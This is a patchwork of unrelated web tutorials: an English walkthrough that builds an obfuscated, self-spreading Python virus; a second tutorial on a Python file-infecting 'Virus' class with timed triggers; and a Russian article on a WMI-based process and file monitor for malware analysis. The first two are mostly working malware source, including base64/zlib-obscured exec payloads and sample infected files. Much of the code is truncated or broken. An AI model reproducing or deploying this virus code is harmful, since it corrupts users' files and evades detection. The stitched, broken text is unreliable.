For example, wouldn’t it be better if we could consider as infected any single file that contains the md5 hash of its name as a comment?

Our virus could start with something like # begin-78ea1850f48d1c1802f388db81698fd0 and end with something like # end-78ea1850f48d1c1802f388db81698fd0 and that would be different for any infected file, making it more difficult to find all the infected files on the system.

So our get_content_if_infectable() function could be modified like this:

def get_content_if_infectable(file, hash):
    # return the content of a file only if it hasn't been infected yet
  data = get_content_of_file(file)

  for line in data:
    if hash in line:
      return None

  return data

Obviously, before calling it you should calculate the hash of the file you’re going to infect like this:

hash = hashlib.md5(file.encode("utf-8")).hexdigest()

and also the get_virus_code() function should be modified to look for the current script hash:

def get_virus_code():
  # open the current file and returns the virus code, that is the code between the
  # begin-{hash} and the end-{hash} tags
  virus_code_on = False
  virus_code = []

  virus_hash = hashlib.md5(os.path.basename(__file__).encode("utf-8")).hexdigest()
  code = get_content_of_file(__file__)

  for line in code:
    if "# begin-" + virus_hash in line:
      virus_code_on = True

    if virus_code_on:
      virus_code.append(line + "n")

    if "# end-" + virus_hash in line:
      virus_code_on = False

  return virus_code

And what about our virus source code? Can it be obfuscated somehow to be a little less easy to spot?

Well, we could try to obscure it by making it different every time we infect a new file, then we can compress it by using the zlib library and converting it in base64 format. We could just pass our plain text virus to a new transform_and_obscure_virus_code() function like this:

def obscure(data: bytes) -> bytes:
    # obscure a stream of bytes compressing it and encoding it in base64
    return base64.urlsafe_b64encode(zlib.compress(data, 9))

def transform_and_obscure_virus_code(virus_code):
    # transforms the virus code adding some randomic contents, compressing it and converting it in base64
  new_virus_code = []
  for line in virus_code:
    new_virus_code.append("# "+ str(random.randrange(1000000))+ "n")
    new_virus_code.append(line + "n")

  obscured_virus_code = obscure(bytes("".join(new_virus_code), 'utf-8'))
  return obscured_virus_code

Obviously, when you obscure your virus compressing it and encoding it in base64 the code is not executable anymore, so you will have to transform it to the original state before executing it. This will be done in the infect method, by using the exec statement like this:

def infect(file, virus_code):
  # infect a single file. The routine opens the file and if it's not been infected yet, infect the file with a custom version of the virus code
  hash = hashlib.md5(file.encode("utf-8")).hexdigest()

  if (data:=get_content_if_infectable(file, hash)):
    obscured_virus_code = transform_and_obscure_virus_code(virus_code)
    viral_vector = "exec("import zlib\nimport base64\nexec(zlib.decompress(base64.urlsafe_b64decode("+str(obscured_virus_code)+")))")"

    with open(file, "w") as infected_file:
      infected_file.write("n# begin-"+ hash + "n" + viral_vector + "n# end-" + hash + "n")

The complete source code of our new virus could be similar to this:

# ################
# chaos.py
# a Python virus
# ###############

# begin-78ea1850f48d1c1802f388db81698fd0

import base64
import glob
import hashlib
import inspect
import os
import random
import zlib

def get_content_of_file(file):
  data = None
    # return the content of a file
  with open(file, "r") as my_file:
    data = my_file.readlines()

  return data
def get_content_if_infectable(file, hash):
    # return the content of a file only if it hasn't been infected yet
  data = get_content_of_file(file)

  for line in data:
    if hash in line:
      return None

  return data

def obscure(data: bytes) -> bytes:
    # obscure a stream of bytes compressing it and encoding it in base64
    return base64.urlsafe_b64encode(zlib.compress(data, 9))

def transform_and_obscure_virus_code(virus_code):
    # transforms the virus code adding some randomic contents, compressing it and converting it in base64
  new_virus_code = []
  for line in virus_code:
    new_virus_code.append("# "+ str(random.randrange(1000000))+ "n")
    new_virus_code.append(line + "n")

  obscured_virus_code = obscure(bytes("".join(new_virus_code), 'utf-8'))
  return obscured_virus_code

def find_files_to_infect(directory = "."):
  # find other files that can potentially be infected 
  return [file for file in glob.glob("*.py")]

def summon_chaos():
  # the virus payload
  print("We are sick, fucked up and complicatednWe are chaos, we can't be cured")

def infect(file, virus_code):
  # infect a single file. The routine open the file and if it's not been infected yet, infect the file with a custom version of the virus code
  hash = hashlib.md5(file.encode("utf-8")).hexdigest()

  if (data:=get_content_if_infectable(file, hash)):
    obscured_virus_code = transform_and_obscure_virus_code(virus_code)
    viral_vector = "exec("import zlib\nimport base64\nexec(zlib.decompress(base64.urlsafe_b64decode("+str(obscured_virus_code)+")))")"

    with open(file, "w") as infected_file:
      infected_file.write("n# begin-"+ hash + "n" + viral_vector + "n# end-" + hash + "n")

def get_virus_code():
  # open the current file and returns the virus code, that is the code between the
  # begin-{hash} and the end-{hash} tags
  virus_code_on = False
  virus_code = []

  virus_hash = hashlib.md5(os.path.basename(__file__).encode("utf-8")).hexdigest()
  code = get_content_of_file(__file__)

  for line in code:
    if "# begin-" + virus_hash in line:
      virus_code_on = True

    if virus_code_on:
      virus_code.append(line + "n")

    if "# end-" + virus_hash in line:
      virus_code_on = False

  return virus_code

# entry point

  # retrieve the virus code from the current infected script
  virus_code = get_virus_code()

  # look for other files to infect
  for file in find_files_to_infect():
    infect(file, virus_code)

  # call the payload


  # delete used names from memory
  for i in list(globals().keys()):
      if(i[0] != '_'):
          exec('del {}'.format(i))

  del i

# end-78ea1850f48d1c1802f388db81698fd0

Now, let’s try this new virus in another directory with the uninfected version of [numbers.py](http://numbers.py) and [hello.py](http://hello.py), and let’s see what happens.

/playgrounds/python/chaos ❯ python chaos.py                                                                            03:09:52 PM
We are sick, fucked up and complicated
We are chaos, we can't be cured

Executing the virus we have the same behavior as we had before, but our infected files are now a little different than before… This is [numbers.py](http://numbers.py) :

# begin-661bb45509227577d3693829a1e1cb33
exec("import zlibnimport base64nexec(zlib.decompress(base64.urlsafe_b64decode(b'eNqVWMty47oRXUtfgdALkxkNC2-AU-Uss8zqVmUxvsWiRNBmLJEqkhqPc-v-expAk5JsOZmoaqwHmo2Dfpw-mDtSWM6MWt-RrXtqu6_GuopZRRtpa7ZjlvJGWFtvLdOFbWq6XoOpKKhldh0-S8YMtev2cOyHiWyr0WkZFhjjtFDzwtO-38afjTF2-fm5Gp_3bVzRtDCsmFfabjy63RRWOKXMsnmlH-OP1moj5h-Hqqv7A6IT0sp54d-ze2WE0iyCVkxxIda1a8iTm8pd302um8q-KZt271L_J_sW4SpBpVyv6mqqyAP5R9-5uLtmUuo1gdcdGdx0GjoyPTuCrkjfkIp4PxESV0KJ9eq1nZ5Jf3Rd2GJDkiHJSDWSw1vY-BsaF5SB8bwnLuaDq-p927kxzYKdKYQymAUutdR2vUIk_kmMqTFw6FX4YgvOBf9w6rYp266BWFdbPPsm5AUjYFRhDf-Fk5K-27-RtiFtyGt3D-XgXEeic1eTNxfTWVhhuF1i-mkGcHsuaBFPWRjFqFqvmn4gPhLgOhw1ApVC2QLcrgCCx-9XvRVGVUtmC1idY7SkUiomuI47CKoKfiOO4FowtNFaWSZDGPvtuDsNLg0gyPZtcmNGvv4tfkJUWkhNMXxoDwEbJ0jnwQcv2EI0D8fBjWPbPfn4QTUT1-36Gr_DUS5aq2CSSht8ItC4mJ-G_Vg1rtxqGZ52qS__fHYecG5IkWXYoaLgGFoF4QGX_lAT9NIIIT6UgKJEyOWPdjiNZfB5_jiXCBdmKZHl8TGUSTAm3phUdTjO2B8c9mu7m8to3NwKASz-cMN0MwhCMs6hGDr3egEO6un773HdckPFdbGc7RC4VApSv3rnJK-O0KN1mtyR5ItPVRrh5v4N_j25lNHwyrIvJHnskrlWNYXK-MxdQHFpr5meGUly4DMoPAx3fX2kuc5CraRJkv-rb7v0epdsQ-5PU_PV3mN6_dEKs9TyDc-RFXShgKdjRUjKIKa-CpoWku_bcCynHgkirdsB3vrhDTAleTJzJMwLINzVXXiI9JD2ITCCr4BqIruqI8feZ7mt9kARW3fmBEwVcJlekH4PbOLzFj5A3vz0yP2fNPlrfnxLsphiXTAuJXIDDDLDAvTxdDj0Xbl7rnrgSsTIgf2ox3guymP1tu-rOsafSuUhHIe2m9Lkn1Ct0Kdju3vZkOa0ewGopyPW5OG4b3cVoH_s0C5stSGvzp818B4JscY8c8qNwT4TnsQCTIxpJNwPPWW14L4g7tDOcwb0gQ-MHwbkNzjG0J8mX1N-ooRzhXh5kIGF70fS9TdIeDO7XB4Jc6kCzOPUHwi03Nj2nSen6w5e5i4EKjDswzzA80Otwkly5J0klGKSZfmz-1m3T26ccGzJAgTAzDpUURAfnrEjhz780mDCEBUm0ODqk6b5f3gMBwFgAzQrWKj25Y9Q6r7S3U-3Sx-TC0Xx-NhdKR74HowC3dZuIdyPvOwXfXy-eFq5ATz7AkHLHpMswd6ygvMYLaNBwHi2-iAjXqOMmJN8KSYol9yLidXVYv46tBOgeOxm4QdEF1Ia-QneroIQfr2DkVR_9WsXlljhShf0s22iaPH5RWPGKGDC1rBnRXKRG0wxjCXOlO-CpcYhYIPXHUutR9Z4P202kXvaEcUKlMTWTa8ueon0oZjhxjuPIfjDH-vP4NM_4w-LP03VUxSdoIKDHDwjLaFRHsjfq_2IdKqoFvbS4jySNKUwZbH0DVfSzHY3uqkf82M1Pee-hLrq4NIyhLQss__dYwyo0ADb4fa3FNbiLSITwOCob2Ag-KRcDc7zyPQsy1BlJUvxxHqZD3IlvCSMFyDm1epD0H4bTg4FIehBpARNrZXo_-qBbwhUKiqvvX06X5lmBc5XYaURZ9hzIX8GGsYRC1TwXzLN4XJUBChb0HIv8Tl4jOGWhQLlrJap9m7sGg4yn2ItgHY32BAwTGW4j0GyYM4eYdBPs1iwVMwpYoWSazDANqFwOOYrGTYbWvfDvddezQDEftk-y0AYd0N7xHuWUSCw39Xu-8ZEWhFUY8ZAkrPYRvu-fwlz-0oC9LhXRGotU6jK5ul-U2rMBGAZ12Y988rHaRnjYUWh8CoEMkoY7eHsQG2EM18OemWVgdCtrkUCyoliuSFyuFwptXY_d-44oYSAIlUA5ViNSAZFAZSMydb-6rCGo3iJs1xImA7kVbu9mxw5jRBv38tjzMfBHUBLxefhymdpjEsbaxG62UseqLc0y1_cG7xhUODGziSk2wvutknb7_R38pcHcl_enxUZj8v-FSbTPWAgf_x5n_uJWE1piyoRigrcoQilBlQHXMzAtJ3litZ2vjRrDjeZ2Dy_8P8E_wH6PJBm')))")
# end-661bb45509227577d3693829a1e1cb33
# numbers.py

import random


for _ in range(10):
  print (random.randint(0,100))

and this is

# begin-8d35108ffe2ad173a697734a3e9938e1
exec("import zlibnimport base64nexec(zlib.decompress(base64.urlsafe_b64decode(b'eNqVWEtv20YQPku_YksfTDUKwX3vFnCPPfYUoIc4IChxabOWSIGk4rhB_3tn9iFLfrSpgVgydzj8ZuabmY-5IlaUVJvlFdm4u67_qI2rqZFlK0xDt9SUrOXGNBtDlTVtUy6XYGqUNlQs_XeqBVd62e0PwziTTT05JfwBo1zRdP1uN2z8VcWsNiJdvq-n-123iY7gBptOun46uO0cPCkuGEsnw-QvCqv46bFj3TfDPrhRQojTwV_Ju7WA0wbIRjOm5LJxLblzc7Ud-tn1czW0VdvtXI6_Vr94S62FgXAWTT3X5Ib8PvTOX-faYNAEfq7I6Obj2JP53pHoigwtqQn6CfitltQsF4_dfE-Gg-v9I9YkG7MVqSeyf_IPDo-kEKphy0V6ZjwsRlc3u653U76KASlZxhrIUlGqlouIBO8MydaUgs0iYDbSQtFeRt21Vde3kOp6E2Nf-7LEDFBemvIHAiVDv3siXUs6X9X-GrjgXE-Cb9eQJxeKKaSxUMwU3rsFCJXipjSxaFJCAMtFO4wE8wCefaABpmSGWg1ZAwSIHk_RKpxyJa2FexcpQ6dCMq41sDRRRJX8dRalYUKV0UZorplP4rCZtsfR5R4E2TzNblqRj7-Gb-G5SjCpVcxetId8TTMUc4-587aQzP1hdNPU9XeYPuAycf12aOLfEMpZWxkpUkUi0HBYHMfdVLeu2ijh73Y5kr9Izj3ONbGrkFltKaYzBFUa8IgxzdBIE2R4XwGIKiKuvnbjcaq8y-evkR9cWF6mEE-3T54k3pigMakbH8007F1s1m6bSDSt38oAHH514_xmDii1JVRk0bvHM3DAps9fQsWgqEpdcuXZLgBnWmkkzKWPoj5AfzZ5dkWyD1ioPKAt8AP-3bmclv5ntfpAsts-C-nkVmuj3nXnQZzbS0qljumnMIGBg4uY7uYypEQzT5U8y4o_h67PLx-zWpPr49x-NNexulaX1jxT-Q3PwcxwbmVAoQ0wm3oWtB0UH5twquYhToe86Ub4GMYnwJQVWSq_VUbCg678TWSAso9-HiAD6pls654cBqxyV-9gQGzc80SIpWJMihPSz36WYN38F6gbbo4Cf-XZz8XhKVt9ia1VKpXmOewmrjz06bjfD321va8HGJSx0qWMGJ9JeaifdkPdxJVkGNRicRi7fs6zP4Ct0KZTt31Yk_a4fQCox0Pk5P6w67Y1oL_to51_1Jo8OozVTz3icx0LzWDhmYhTc-i5kOKY1DBuXzWVkQZ7HBAHO5wZ0AiYGVwF5BPEMQ7HGVmF-8QH5hOGKP0Qvp5IP7wxg9fJ5ekWv5VqAD3Nw55Az03d0ONwumzhEEHJYXAsF37E3qT1Xewb6UMp4uDJPBmz1aq4d9-a7s5Nc9xaRkCt4iyVVnIoG47sMERvfmgvpdWsDGNAnHfa5v9MsrhDYSLgjoCDeld99WRHrrtvbpvfZmeC4va2v5A78Lc38vO2caeJ-3ow4yHm5wNOljeArz5A0la32SoLmEQpYKvFTqO6xAnzSkU8BhWRqnymJTSIBCFx710cFo9jNwOK2z6pPph1vqRhRMHHRRL81SvYSc1HPDuzTMNPMvneY4JmwfoGY-hbwSMDmGXCmJMkOatOLLK1QjDfuieaQ8pGVB4nuofJ8XLjrMP86aYoV4AUGzc_uuAlqlgJcxydhyR8x8D-9j7xHgw3XprruykuDa5K4P8z0gp65Yb8Vu-m4JRKwTk7tzhbS0YoEWeB0tKKZPZGOw1Tcajn-wI51Nd7l1c-p1W1-u8mg66iHOoRn_6WxDp5izwDEZT2gKKgcS535_PWxNrhKTZtdmJPIEwK5EJ6WcgG99LrZc4-jceYstIqGlUeaHqQ3MH_xQ1xlHNjcZSfe3t3x0IpTNpuSiqmTrATk98DrSXz1v9SZ2ENQ5yLDWi5h_A8q0AeplcMKDA9rbUXe1dSZniyBDmnIkpuBLQr4pthzx5g0c-JLMJGlSo1Z8AcMAhYhfIaeeHl-di5r-6l9mpHmOvnrXPaB9N27A7xHYuDCnzJ25dNGUWD5FJFwMxvXnj4bhge_N6-kABDfFZ8IdSGlYFZabu_KTVS8xvQJF7Tv7Mso3oSHCgRyabhNQ_hbEFt-JgvFr2C_gOHlyIhHYn0pkEhPpAk7tvWHeYoczSscZQI9TTFbQGX4tuXshLU1hJCQYkT-6QUQD5E0ridmx05TpBvbOQp1GPv9qClgnMJwkuEvHSBiNDKKHmAbfmqeHBP8JHex2DpYcZRcHdt3n0uv5Cfbsh1dZ0MhKHMBgP88ZvpGlCQ739fF7gR6znv0lsAcLZkkYggkzj0Fpp2IQjIrYqpNajyQ-f8wH8R_APeFJAZ')))")
# end-8d35108ffe2ad173a697734a3e9938e1
print("hello world")

Look at that, it’s not so easy to be read now, right? And every infection is different than the other one! Moreover, every time the infection is propagated, the compressed byte64 virus is compressed and encoded again and again.

And this is just a simple example of what one could do… for example, the virus could open the target and put this piece of code at the beginning of a random function, not always at the beginning of the file, or put it in another file and make just a call to this file with a malicious import statement or so…

To sum up

In this article, we have seen that writing a computer virus in Python is a trivial operation, and even if it’s probably not the best language to be used for writing viruses… it’s worth keeping your eyes wide open, especially on a production server. :)

Happy coding!


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6 minute read

Sometimes we find our files being infected with a computer virus. In this tutorial, we will get introduced to the concept of a virus by writing a simple one in Python.

First thing first, let’s get introduced to the definition of a computer virus. A virus is a typical malware program that infects a particular type of file or most files by injecting data or code. It tries to list files in all directories and then inject typical data/code in those files.

Point to be noted; a virus does not replicate itself. It just continuously infects all files in the directories/folders. The malware that replicates itself and consumes hard disk space is typically called a Worm.

If you are interested to write other types of malwares, you can go through my previous posts:

  • Write a Backdoor in Python
  • Write a Worm (Malware) in Python
  • A Basic Keylogger in Python

Okay, now, let’s get started writing one.


To write a simple virus, we will use the following modules.

import os
import datetime
import pathlib
import time

os module

Here, module os is the most important one as it will help us to list all the files along with the absolute path. An absolute path starts with the root directory /. For example, if my current working directory is Downloads and there is file named hi.txt inside a subfolder named test_sub. Then

absolute path: /Users/roy/Downloads/test_sub/hi.txt
relative path: test_sub/hi.txt

Absolute path is necessary here as while working with numerous files you must know the exact location. Using filenames only, your script do not know where to look for that files.

pathlib module

Here, we use pathlib to retrive the extension of a file. It can be done in multiple ways though, so you may not find this module necessary at all.

datetime and time

datetime and time is used only for the start time of execution. If you want the script to start working right now, you may not need these modules as well.

Virus Class

The initializer method

Now, lets create a virus class that accepts four arguments when it is called.

class Virus:
    def __init__(self, infect_string=None, path=None, 
                         extension=None, target_file_list=None):
        if isinstance(infect_string, type(None)):
            self.infect_string = "I am a Virus"
            self.infect_string = infect_string
        if isinstance(path, type(None)):
            self.path = "/"
            self.path = path
        if isinstance(extension, type(None)):
            self.extension = ".py"
            self.extension = extension
        if isinstance(target_file_list, type(None)):
            self.target_file_list = []
            self.target_file_list = target_file_list

Here, the infect_string will be used to insert in a file. If the user does not provide an input, the default value is “I am a Virus”.

By default the path is set to be the root directory /. From here, it will browse all subdirectories and files. However, the user can provide a target path as well.

User can define target file extension. If not, the default is set to be python files .py.

User can also provide the target_file_list that conatains all the listed target files. If None, the constructor method set it as an empty list.

Btw, if you are wondering that why the code looks a bit ugly, you can use the following as well.

class Virus:
    def __init__(self, infect_string="I am a Virus", path="/", 
                         extension=".py", target_file_list=[]):
            self.infect_string = infect_string
            self.path = path
            self.extension = extension
            self.target_file_list = target_file_list

I just prefer the earlier way to set all default values inside the constructor method. However, the latter is a lot easier to understand and use.

Method to list all target files

here we use another mthod named list_files that lists all files within directories and subdirectories given an initial path.

    def list_files(self, path):
        files_in_current_directory = os.listdir(path)
        for file in  files_in_current_directory:
            # avoid hidden files/directories (start with dot (.))
            if not file.startswith('.'):
                # get the full path
                absolute_path = os.path.join(path, file)
                # check the extension
                file_extension = pathlib.Path(absolute_path).suffix
				# check if it is a directory
                if os.path.isdir(absolute_path):
				# check if the target file extension matches
                elif file_extension == self.extension:
                    is_infected = False
                    with open(absolute_path) as f:
                        for line in f:
                            if self.infect_string in line:
                                self.is_infected = True
                    if is_infected == False:

here, in the method we did the followings:

  1. list all files in the current working directory
  2. iterate over all files and do the followings
    • only consider visible files (avoid hidden files, e.g., starts with dot . in Unix-based systems)
    • get the absolute path using os.path.join
    • retrieve the file extension using pathlib.Path
    • check if it is a directory using os.path.isdir (if yes, call the same function and pass the path to continue digging deeper, in coding world it is called a **recursive function**)
    • Check if the extension matches with target extension (if yes, check whether it is already infected by looking for the string in the file; if string not found, append to the list).

Method to infect the files

Here, we will add another method that can infect (insert/prepend) the string in the given filename.

    def infect(self, file_abs_path):
        if os.path.basename(file_abs_path) != "virus.py":
                f = open(file_abs_path, 'r')
                data = f.read()
                virus = open(file_abs_path, 'w')
                virus.write(self.infect_string + "n" + data )
            except Exception as e:

To prepend the self.infect_string, we first read the whole file and keep the contents in a variable data; then add our string before the data and write to the file.

point to be noted, in this example as we are using python files, we need to exclude our own file, right? :zany_face:

that’s why I exclude the filename there in the very first condition.

Final method that integrates everything

Now, we can first define when to start our virus.

  • Do you want to set a timer (e.g., 60 seconds), then provide input to the timer while calling this method.
  • Do you want to set a date (e.g., someone’s birthday), then provide input to the target_date while calling this method.

And, then our primary mission begins.

  1. List all target files by calling the list_files method
  2. For each file, insert the string using the infect method

okay, so, here is our code

    def start_virus_infections(self, timer=None, target_date=None):
        if not isinstance(timer, type(None)):
            for target in self.target_file_list:
        elif not isinstance(target_date, type(None)):
            today = str(datetime.datetime.today())[:10]
            if str(target_date) == today:
                for target in self.target_file_list:
            print("User must provide either a timer or a date using datetime.date()")

Main Function

Now, let’s create our main function and run the code

if __name__ == "__main__":
    current_directory = os.path.abspath("")
    virus = Virus(path=current_directory)
    # virus.start_virus_infections(target_date=datetime.date(2021,6,1))
    # print(virus.target_file_list)

Here, we first create an object of the class. And then call the start_virus_infections method with providing a timer or a date. To avoid hassle, use os.path.abspath(""), which refers to the current directory only so that you do not get hurt with inserting the string in other necessary python codes you wrote before.


To have a easier testing environment, create a few python files in the same directory and check if your virus is able to insert the string to those files. To make things easier, run the following code to create three python files (create a seperate script).

if __name__ == '__main__':
    filenames = ["test1.py", "test2.py", "test3.py"]
    data = 'print("hello")n'

    for file in filenames:
        f = open(file, "w")

Both codes are available in GitHub.

that’s all folks, you can look at other security concept tutorials in python. I have created a repository for that. I am planning to provide security concepts by writing python codes. Please feel free to put a star if you like the repository.


Also, the associated blog post links are available in the ReadMe file over there.

Have a good day! Cheers!!!


  1. Viruses – From Newbie to pro
  2. os- Miscellaneous operating system interfaces

Утилита на Python для анализа вредоносных программ

В сегодняшней статье я покажу, как написать программу на Python для анализа вирусов и других вредоносных программ.

Еще по теме:

  • Сбор информации о системе удаленно с помощью Python
  • Как написать шифровальщик на Python
  • Как написать троян на Python

От­сле­живать про­цес­сы будем с помощью механиз­ма WMI. Это дела­ется дос­таточ­но прос­то:

import wmi

notify_filter = «creation»

process_watcher = wmi.WMI().Win32_Process.watch_for(notify_filter)

while True:

    new_process = process_watcher()



Здесь notify_filter может при­нимать сле­дующие зна­чения:

  • «operation» — реаги­руем на все воз­можные опе­рации с про­цес­сами;
  • «creation» — реаги­руем толь­ко на соз­дание (запуск) про­цес­са;
  • «deletion» — реаги­руем толь­ко на завер­шение (унич­тожение) про­цес­са;
  • «modification» — реаги­руем толь­ко на изме­нения в про­цес­се.

Да­лее (в треть­ей стро­ке) мы соз­даем объ­ект‑наб­людатель process_watcher, который будет сра­баты­вать каж­дый раз, ког­да нас­тупа­ет событие с про­цес­сами, опре­делен­ное в notify_filter (в нашем слу­чае при его запус­ке). Пос­ле чего мы в бес­конеч­ном цик­ле выводим имя вновь запущен­ного про­цес­са и вре­мя его запус­ка. Вре­мя пред­став­лено в виде стро­ки в фор­мате yyyymmddHHMMSS.mmmmmmsYYY (более под­робно об этом фор­мате мож­но почитать здесь), поэто­му для вывода вре­мени в более при­выч­ной фор­ме мож­но написать неч­то вро­де фун­кции пре­обра­зова­ния фор­мата вре­мени:

def date_time_format(date_time):

    year = date_time[:4]

    month = date_time[4:6]

    day = date_time[6:8]

    hour = date_time[8:10]

    minutes = date_time[10:12]

    seconds = date_time[12:14]

    return ‘{0}/{1}/{2} {3}:{4}:{5}’.format(day, month, year, hour, minutes, seconds)

Во­обще, делать такие вещи прос­то в бес­конеч­ном цик­ле не очень хорошо, поэто­му мы офор­мим все это в виде клас­са, что­бы потом запус­кать его в отдель­ном потоке. Таким обра­зом мы получим воз­можность отсле­живать в одном потоке, нап­ример, момен­ты соз­дания про­цес­сов, а в дру­гом — их унич­тожения. Итак, класс ProcessMonitor:





























class ProcessMonitor():

    def __init__(self, notify_filter=‘operation’):

        self._process_property = {

            ‘Caption’: None,

            ‘CreationDate’: None,

            ‘ProcessID’: None,


        self._process_watcher = wmi.WMI().Win32_Process.watch_for(



    def update(self):

        process = self._process_watcher()

        self._process_property[‘EventType’] = process.event_type

        self._process_property[‘Caption’] = process.Caption

        self._process_property[‘CreationDate’] = process.CreationDate

        self._process_property[‘ProcessID’] = process.ProcessID


    def event_type(self):

        return self._process_property[‘EventType’]


    def caption(self):

        return self._process_property[‘Caption’]


    def creation_date(self):

        return date_time_format(self._process_property[‘CreationDate’])


    def process_id(self):

        return self._process_property[‘ProcessID’]

При ини­циали­зации клас­са мы соз­даем спи­сок свой­ств про­цес­са _process_property в виде сло­варя и опре­деля­ем объ­ект наб­людате­ля за про­цес­сами (при этом зна­чение notify_filter может быть опре­деле­но в момент ини­циали­зации клас­са и по умол­чанию задано как «operation»). Спи­сок свой­ств про­цес­са может быть рас­ширен (более под­робно о свой­ствах про­цес­сов мож­но почитать здесь).

Ме­тод update() обновля­ет поля _process_property, ког­да про­исхо­дит событие, опре­делен­ное зна­чени­ем notify_filter, а методы event_type, caption, creation_date и process_id поз­воля­ют получить зна­чения соот­ветс­тву­ющих полей спис­ка свой­ств про­цес­са (обра­ти вни­мание, что эти методы объ­явле­ны как свой­ства клас­са с исполь­зовани­ем декора­тора @property).

Те­перь это все мож­но запус­кать в отдель­ном потоке. Для начала соз­дадим класс Monitor, нас­леду­емый от клас­са Thread (из Python-модуля threading):























from threading import Thread

import wmi

import pythoncom


# Не забываем вставить здесь описание класса ProcessMonitor


class Monitor(Thread):

    def __init__(self, action):

        self._action = action


    def run(self):


        proc_mon = ProcessMonitor(self._action)

        while True:









При желании цикл мож­но сде­лать пре­рыва­емым, нап­ример по нажатию какого‑либо сочета­ния кла­виш (для это­го нуж­но исполь­зовать воз­можнос­ти модуля keyboard и его фун­кции is_pressed()). Вмес­то вывода резуль­татов на экран мож­но писать резуль­тат работы прог­раммы в лог‑файл, для чего при­меня­ется соот­ветс­тву­ющая фун­кция, которую сле­дует исполь­зовать вмес­то print().

Да­лее уже мож­но запус­кать монито­ринг событий про­цес­сов в отдель­ных потоках:

# Отслеживаем события создания процессов

mon_creation = Monitor(‘creation’)


# Отслеживаем события уничтожения процессов

mon_deletion = Monitor(‘deletion’)


В ито­ге получим при­мер­но сле­дующую кар­тину.

Ре­зуль­таты работы нашего Python-скрип­та для отсле­жива­ния событий соз­дания и унич­тожения про­цес­сов

Следим за файловыми операциями
Здесь, как мы и говори­ли в начале, мож­но пой­ти дву­мя путями: исполь­зовать спе­циали­зиро­ван­ные API-фун­кции Windows или воз­можнос­ти, пре­дос­тавля­емые механиз­мом WMI. В обо­их слу­чаях монито­ринг событий луч­ше выпол­нять в отдель­ном потоке, так же как мы сде­лали при отсле­жива­нии про­цес­сов. Поэто­му для начала опи­шем базовый класс FileMonitor, а затем от него нас­леду­ем класс FileMonitorAPI, в котором будем исполь­зовать спе­циали­зиро­ван­ные API-фун­кции Windows, и класс FileMonitorWMI, в котором при­меним механиз­мы WMI.

Итак, наш базовый класс будет выг­лядеть при­мер­но так:































class FileMonitor:

    def __init__(self, notify_filter, **kwargs):

        self._notify_filter = notify_filter

        self._kwargs = kwargs

        self._event_properties = {

            ‘Drive’: None,

            ‘Path’: None,

            ‘FileName’: None,

            ‘Extension’: None,

            ‘Timestamp’: None,

            ‘EventType’: None,



    def drive(self):

        return self._event_properties[‘Drive’]


    def path(self):

        return self._event_properties[‘Path’]


    def file_name(self):

        return self._event_properties[‘FileName’]


    def extension(self):

        return self._event_properties[‘Extension’]


    def timestamp(self):

        return self._event_properties[‘Timestamp’]


    def event_type(self):

        return self._event_properties[‘EventType’]

Здесь при ини­циали­зации так­же исполь­зует­ся параметр notify_filter (его воз­можные зна­чения опре­деля­ются в зависи­мос­ти от того, исполь­зуют­ся API или WMI) и параметр **kwargs, с помощью которо­го опре­деля­ется путь к отсле­жива­емо­му фай­лу или катало­гу, его имя, рас­ширение и про­чее. Эти зна­чения так­же зависят от исполь­зования API или WMI и будут кон­кре­тизи­рова­ны уже в клас­сах‑нас­ледни­ках. При ини­циали­зации клас­са соз­дает­ся сло­варь _event_property для хра­нения свой­ств события: имя дис­ка, путь к фай­лу, имя фай­ла, рас­ширение, мет­ка вре­мени и тип события (по ана­логии с клас­сом монито­рин­га событий про­цес­сов). Ну а с осталь­ными метода­ми нашего базово­го клас­са, я думаю, все и так понят­но: они поз­воля­ют получить зна­чения соот­ветс­тву­юще­го поля из сло­варя свой­ств события.

Используем API Windows

В осно­ву это­го вари­анта реали­зации монито­рин­га будет положе­на фун­кция WaitForSingleObject(). Упо­мяну­тая фун­кция занима­ется тем, что ждет, ког­да объ­ект (хендл которо­го передан в качес­тве пер­вого парамет­ра) перей­дет в сиг­наль­ное сос­тояние, и воз­вра­щает WAIT_OBJECT_0, ког­да объ­ект изме­нит свое сос­тояние. Помимо этой фун­кции, в Windows есть весь­ма полез­ная фун­кция ReadDirectoryChangesW(), наз­начение которой — сле­дить за изме­нени­ями фай­ла или катало­га, ука­зан­ного в одном из парамет­ров фун­кции. Так­же в про­цес­се монито­рин­га мы задей­ству­ем API CreateFile() и CreateEvent().

Итак, нач­нем.











































# Подключим все необходимые модули

import pywintypes

import win32api

import win32event

import win32con

import win32file

import winnt

class FileMonitorAPI(FileMonitor):

    def __init__(self, notify_filter = ‘FileNameChange’, **kwargs):

        # Здесь в качестве **kwargs необходимо указывать

        # путь к файлу или директории

        # в виде «Path=r’e:\example\file.txt'»

        FileMonitor.__init__(self, notify_filter, **kwargs)

        # Получаем хендл нужного файла или каталога

        self._directory = win32file.CreateFile(



            win32con.FILE_SHARE_READ |




            win32con.FILE_FLAG_BACKUP_SEMANTICS |




        # Инициализируем структуру типа OVERLAPPED

        self._overlapped = pywintypes.OVERLAPPED()

        # и поместим в нее хендл объекта «событие» в сброшенном состоянии

        self._overlapped.hEvent = win32event.CreateEvent(






        # Выделим память, куда будет записана информация

        # об отслеживаемом файле или каталоге

        self._buffer  = win32file.AllocateReadBuffer(1024)

        # Здесь будет число байтов сведений о файле или каталоге,

        # записанных при наступлении события

        self._num_bytes_returned = 0

        # Установим «наблюдатель» за событиями (его мы опишем ниже)


Зна­чения парамет­ра notify_filter кор­релиру­ют с кон­стан­тами FILE_NOTIFY_CHANGE_FILE_NAME, FILE_NOTIFY_CHANGE_DIR_NAME или FILE_NOTIFY_CHANGE_LAST_WRITE. Для их пре­обра­зова­ния мы ниже опи­шем спе­циаль­ный метод. Так­же опре­делим метод update(), с помощью которо­го и будем обновлять све­дения о про­изо­шед­шем событии.



















def update(self):

    while True:

        # Ждем наступления события (поскольку второй параметр 0, то время

        # ожидания бесконечно)

        result = win32event.WaitForSingleObject(self._overlapped.hEvent, 0)

        if result == win32con.WAIT_OBJECT_0:

            # Если событие произошло, то получим размер сохраненных сведений о событии

            self._num_bytes_returned = win32file.GetOverlappedResult(





            # Поместим информацию о событии в _event_properties

            self._event_properties[‘Path’] = self._get_path()

            self._event_properties[‘FileName’] = self._get_file_name()




На­пишем метод уста­нов­ки «наб­людате­ля» за событи­ями в фай­ловой сис­теме (в ней мы задей­ству­ем фун­кцию ReadDirectoryChangesW()):

def _set_watcher(self):









